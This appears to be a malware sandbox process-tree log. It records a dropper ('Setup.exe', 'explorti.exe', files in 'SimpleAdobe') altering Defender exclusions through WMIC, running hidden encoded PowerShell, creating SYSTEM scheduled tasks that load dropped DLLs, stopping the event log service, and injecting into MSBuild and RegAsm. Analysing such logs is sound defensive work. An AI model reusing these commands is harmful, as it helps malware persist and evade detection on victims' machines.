C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:5608
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RmqlacUQU\DhfJYe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ayCOowYLgjutNKI" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ayCOowYLgjutNKI2" /F /xml "C:\Program Files (x86)\RmqlacUQU\QCNqlOa.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2036
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ayCOowYLgjutNKI"2⤵PID:3912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ayCOowYLgjutNKI"2⤵PID:5956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AvuuMZnAgveLTP" /F /xml "C:\Program Files (x86)\XYcGyWaqnbhU2\jYoplUh.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5216
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wHxxZovhMVeXN2" /F /xml "C:\ProgramData\ERCUCymjGgNKOwVB\ewzluku.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YEzBJjbnitNtrmmkX2" /F /xml "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\ZcvXHny.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XgFMMTvgqSOFYnnQAbZ2" /F /xml "C:\Program Files (x86)\qioMUrUoKCErC\uXNJzhu.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZNzITvxeQRflwsDJD" /SC once /ST 21:55:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\BSwetpbI\TGUetlv.dll\",#1 /jXdidYkG 385132" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZNzITvxeQRflwsDJD"2⤵PID:5580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dyrOw1" /SC once /ST 11:40:31 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""2⤵
- Scheduled Task/Job: Scheduled Task
PID:2252
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "dyrOw1"2⤵PID:5472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dyrOw1"2⤵PID:4012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LOHPKuWKJcOzSYPZu"2⤵PID:2060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 23442⤵
- Program crash
PID:664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5204 -ip 52041⤵PID:5560
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:5844 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5972
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5884
-
C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\AXChDNl.exeC:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\AXChDNl.exe MC /pTOFdidyt 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:648 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bIOEZkRAagKtMyjtNl"2⤵PID:5884
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:5988
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2044
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:1860
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5872 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:1952
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\nXmjFVOHU\CUgSrT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHXYugTugXnbcjp" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JHXYugTugXnbcjp2" /F /xml "C:\Program Files (x86)\nXmjFVOHU\tKdeIZH.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JHXYugTugXnbcjp"2⤵PID:6020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JHXYugTugXnbcjp"2⤵PID:5296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LfFBsRWwzAIUSz" /F /xml "C:\Program Files (x86)\ANKVsfPAuVEU2\IGnJJps.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ybYNGucztUodC2" /F /xml "C:\ProgramData\hVWjTjnIaijqmUVB\pisCgeC.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XPcedSoTrgNFjKDYa2" /F /xml "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\nUdthBM.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tFGbXHHzrJEaMkVZkYf2" /F /xml "C:\Program Files (x86)\tuyZfYaPCcjxC\mOuiFMl.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TEcaJ1" /SC once /ST 20:23:27 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""2⤵
- Scheduled Task/Job: Scheduled Task
PID:3656
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "TEcaJ1"2⤵PID:5984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TEcaJ1"2⤵PID:1904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fxxmGIjnSbKlnnNZc"2⤵PID:4644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 648 -s 20602⤵
- Program crash
PID:2044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5180 -ip 51801⤵PID:2060
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\OIWUzfnoSeVAWsLl\BSwetpbI\TGUetlv.dll",#1 /jXdidYkG 3851321⤵PID:6056
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\OIWUzfnoSeVAWsLl\BSwetpbI\TGUetlv.dll",#1 /jXdidYkG 3851322⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:5252 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZNzITvxeQRflwsDJD"3⤵PID:5728
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:4044
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
PID:5356
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:5640
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5032 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1928 -parentBuildID 20240401114208 -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 24929 -prefMapSize 245222 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6f3aba9-5fff-4aa8-b447-34fc2f87b3a5} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" gpu3⤵PID:4616
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20240401114208 -prefsHandle 2264 -prefMapHandle 2260 -prefsLen 24965 -prefMapSize 245222 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f1689bc-4897-4605-826f-9715bb90d11f} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" socket3⤵
- Checks processor information in registry
PID:6076
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3728 -childID 1 -isForBrowser -prefsHandle 3720 -prefMapHandle 3716 -prefsLen 25106 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {238abdea-82e9-45c4-a6ab-9898d696c075} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab3⤵PID:3836
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3556 -childID 2 -isForBrowser -prefsHandle 3612 -prefMapHandle 3644 -prefsLen 29399 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f73b8942-cd6f-4801-95da-6403406815d0} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab3⤵PID:2040
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4364 -childID 3 -isForBrowser -prefsHandle 4356 -prefMapHandle 4352 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6895749b-7eb4-4273-b6ba-82eaa1f0fbec} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab3⤵PID:5132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4952 -prefMapHandle 4948 -prefsLen 30404 -prefMapSize 245222 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c7c6948-f0cf-4154-9583-f1e52c2cb1da} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" utility3⤵
- Checks processor information in registry
PID:4796
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4576 -childID 4 -isForBrowser -prefsHandle 5356 -prefMapHandle 4592 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e344de7c-1591-4600-83d0-4eee22333ac4} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab3⤵PID:5416
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5752 -childID 5 -isForBrowser -prefsHandle 5764 -prefMapHandle 5760 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {430df9d4-b43c-4cf3-b205-4d2c59f39f89} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab3⤵PID:5316
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4464 -childID 6 -isForBrowser -prefsHandle 6036 -prefMapHandle 6032 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c1d4f80-52e9-4d03-9bee-4434c5273376} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab3⤵PID:5728
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5928 -childID 7 -isForBrowser -prefsHandle 4464 -prefMapHandle 4428 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ace4c4d-14d3-4ce2-ae04-54a4fb0de52c} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab3⤵PID:5624
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6268 -childID 8 -isForBrowser -prefsHandle 6244 -prefMapHandle 6248 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c475d5d-216a-4f8b-b4b4-ac61415c7766} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab3⤵PID:6008
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6084 -childID 9 -isForBrowser -prefsHandle 6100 -prefMapHandle 6096 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11cf2f32-c7da-407c-ad29-8a84c3dd0aae} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab3⤵PID:5324
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5104 -ip 51041⤵PID:3188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6072 -ip 60721⤵PID:5004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1492 -ip 14921⤵PID:1528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 648 -ip 6481⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3512
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5528
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3480
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5692
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5240
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6004
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5308
-
C:\Users\Admin\Desktop\Setup.exe"C:\Users\Admin\Desktop\Setup.exe"1⤵
- Modifies firewall policy service
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4044 -
C:\Users\Admin\Documents\SimpleAdobe\abQaeBLwmX9V57tLKTE3eOuX.exeC:\Users\Admin\Documents\SimpleAdobe\abQaeBLwmX9V57tLKTE3eOuX.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3580 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:5492
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:1496
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\6_8BpX05xBxPNdxoMR3fjLwI.exeC:\Users\Admin\Documents\SimpleAdobe\6_8BpX05xBxPNdxoMR3fjLwI.exe2⤵
- Executes dropped EXE
PID:1868 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:5560
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:3980
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:2636
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:3680
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:5480
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "CIFUBVHI"3⤵
- Launches sc.exe
PID:2348
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\av_cOAXWNrelQa039CGbm0A1.exeC:\Users\Admin\Documents\SimpleAdobe\av_cOAXWNrelQa039CGbm0A1.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6036 -
C:\Users\Admin\AppData\Local\Temp\is-NQPM2.tmp\av_cOAXWNrelQa039CGbm0A1.tmp"C:\Users\Admin\AppData\Local\Temp\is-NQPM2.tmp\av_cOAXWNrelQa039CGbm0A1.tmp" /SL5="$80242,5424534,54272,C:\Users\Admin\Documents\SimpleAdobe\av_cOAXWNrelQa039CGbm0A1.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1784
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\4Iy1KUXaumS5KWIhCg2YizTi.exeC:\Users\Admin\Documents\SimpleAdobe\4Iy1KUXaumS5KWIhCg2YizTi.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5448
-
-
C:\Users\Admin\Documents\SimpleAdobe\kJjL0w6C70s0bwCeRI5o95qa.exeC:\Users\Admin\Documents\SimpleAdobe\kJjL0w6C70s0bwCeRI5o95qa.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5832 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:2236
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\IRrr6YljmO8hEIxi45BS9F3G.exeC:\Users\Admin\Documents\SimpleAdobe\IRrr6YljmO8hEIxi45BS9F3G.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4912
-
-
C:\Users\Admin\Documents\SimpleAdobe\cRS5O_os57KVEKl2I6n_mlOZ.exeC:\Users\Admin\Documents\SimpleAdobe\cRS5O_os57KVEKl2I6n_mlOZ.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5504 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe3⤵
- Suspicious use of SetWindowsHookEx
PID:1612
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\sxM96ISlNbOtGCb6tmhTPqMM.exeC:\Users\Admin\Documents\SimpleAdobe\sxM96ISlNbOtGCb6tmhTPqMM.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:2364 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:3020
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\7NybowgkTtFNZ6zV5tAShfiu.exeC:\Users\Admin\Documents\SimpleAdobe\7NybowgkTtFNZ6zV5tAShfiu.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:6048 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:2956
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:6016
-
C:\Users\Admin\Desktop\Setup.exe"C:\Users\Admin\Desktop\Setup.exe"1⤵
- Suspicious use of SetWindowsHookEx
PID:2672
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1548
-
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exeC:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe1⤵
- Executes dropped EXE
PID:5108 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:5400
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:5204
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:1220
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:2800
-
-
C:\Users\Admin\Desktop\Setup.exe"C:\Users\Admin\Desktop\Setup.exe"1⤵
- Modifies firewall policy service
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5024
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1892
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1304
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1848
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4896
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:976
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2016
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6036
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6016
-
